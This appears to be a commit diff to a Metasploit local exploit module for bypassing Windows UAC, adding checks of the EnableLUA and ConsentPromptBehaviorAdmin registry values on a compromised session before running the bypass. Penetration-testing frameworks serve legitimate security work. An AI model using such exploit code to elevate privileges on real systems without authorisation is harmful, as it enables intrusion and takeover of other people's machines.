Merge branch 'mubix-bypassuac_uac_check'
This commit is contained in:
commit
e02adc1f35
|
@ -60,7 +60,35 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
end
|
||||
}
|
||||
if not vuln
|
||||
print_error("#{winver} is not vulnerable.")
|
||||
print_error("#{winver} does not have UAC")
|
||||
return
|
||||
end
|
||||
|
||||
root_key, base_key = session.sys.registry.splitkey("HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System")
|
||||
open_key = session.sys.registry.open_key(root_key, base_key)
|
||||
lua_setting = open_key.query_value('EnableLUA')
|
||||
|
||||
if lua_setting.data == 1
|
||||
print_status "UAC is Enabled, checking level..."
|
||||
else
|
||||
print_error "UAC is not enabled, no reason to run module, exiting..."
|
||||
print_error "Run exploit/windows/local/ask to elevate"
|
||||
return
|
||||
end
|
||||
|
||||
uac_level = open_key.query_value('ConsentPromptBehaviorAdmin')
|
||||
|
||||
case uac_level.data
|
||||
when 2
|
||||
print_error "UAC is set to 'Always Notify'"
|
||||
print_error "This module does not bypass this setting, exiting..."
|
||||
return
|
||||
when 5
|
||||
print_good "UAC is set to Default"
|
||||
print_good "BypassUAC can bypass this setting, continuing..."
|
||||
when 0
|
||||
print_error "UAC is not enabled, no reason to run module"
|
||||
print_error "Run exploit/windows/local/ask to elevate"
|
||||
return
|
||||
end
|
||||
|
||||
|
|
Loading…
Reference in New Issue